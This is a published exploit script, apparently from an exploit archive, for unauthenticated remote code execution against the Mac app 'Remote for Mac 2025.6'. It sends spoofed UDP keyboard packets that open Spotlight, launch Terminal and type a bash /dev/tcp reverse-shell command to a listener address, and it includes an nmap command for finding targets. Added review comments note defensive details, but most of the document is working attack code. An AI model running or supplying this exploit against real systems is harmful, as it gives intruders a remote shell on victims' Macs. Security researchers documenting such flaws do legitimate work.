# Exploit Title: Remote for Mac 2025.6 - Remote Code Execution (RCE)
# Date: 2025-05-27
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6

#!/usr/bin/env python3


'''
The vulnerability in Remote for Mac 2025.6 allows an unauthenticated remote
attacker to achieve Remote Code Execution (RCE) by sending a crafted sequence
of UDP packets that simulate keyboard input.

- Requires the "Allow unknown devices" setting to be enabled (it is disabled by default)

# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer

'''

import socket
from time import sleep


# NOTE(review): the "#!/usr/bin/env python3" line near the top of the file is
# not on line 1, so it does not act as a shebang; the script must be started
# with an explicit interpreter.
#
# Everything below is fire-and-forget UDP: the script never calls recv(), so it
# cannot observe whether the target accepted, rejected or even received any
# packet.  The sleep() calls are the only pacing between steps.
# Defender note: per the module docstring this only works while the
# "Allow unknown devices" setting is enabled (disabled by default); the
# traffic pattern is a burst of small UDP datagrams to the service port from
# an unpaired host.

target_ip = "192.168.8.102"  # hard-coded target address (edit before use)
target_port = 49229  # UDP port of the service on the target

lhost = "192.168.8.100"  # listener address substituted into the payload string
lport = "4444"  # kept as str; it is only interpolated into the f-string below

# Raw key-event datagrams as hex; decoded with bytes.fromhex() before sending.
# Only the comments the author left identify individual events.
initial_packets_hex: list[str] = [
    "07000200370001", # press ⌘ (Command key)
    "07000200370001",
    "060003002000", # space
    "07000200370000",
    "07000200370000" # release ⌘
]


# Two-event pair sent after each typed string (press/release, judging by the
# trailing 01/00 bytes, as in the ⌘ events above — not labelled on the page).
final_packets_hex: list[str] = [
    "07000200240001",
    "07000200240000"
]


# NOTE(review): the socket is not closed on an exception path; the idiomatic
# form would be `with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:`.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

print("Starting exploit..")

# Step 1: send the initial key events.  `i` is unused; a plain `for` would do.
for i, hex_packet in enumerate(initial_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))


sleep(1)


# Step 2: type a string one character at a time.  Each datagram is the fixed
# 4-byte prefix followed by the character encoded as UTF-16LE (2 bytes for the
# ASCII characters used here).
prefix = bytes.fromhex("06000300")
text = "terminal"

for i, ch in enumerate(text):
    ch_utf16le = ch.encode("utf-16le")
    packet = prefix + ch_utf16le
    sock.sendto(packet, (target_ip, target_port))


sleep(2)


# Step 3: send the final key-event pair after the typed text.
for i, hex_packet in enumerate(final_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))


sleep(2)

# Step 4: type the command string built from lhost/lport, character by
# character, using the same prefix framing as step 2.
payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
print(f"Typing the reverse shell payload..")  # f-string with no placeholders

for i, ch in enumerate(payload):
    ch_utf16le = ch.encode("utf-16le")
    packet = prefix + ch_utf16le
    sock.sendto(packet, (target_ip, target_port))


sleep(2)

print("Executing payload..")

# Step 5: the same final key-event pair as step 3, sent after the typed string.
for i, hex_packet in enumerate(final_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))

sleep(2)
# "completed" here means only that every datagram was handed to the kernel;
# nothing above confirms that the target acted on any of them.
print("Exploit completed.")

sock.close()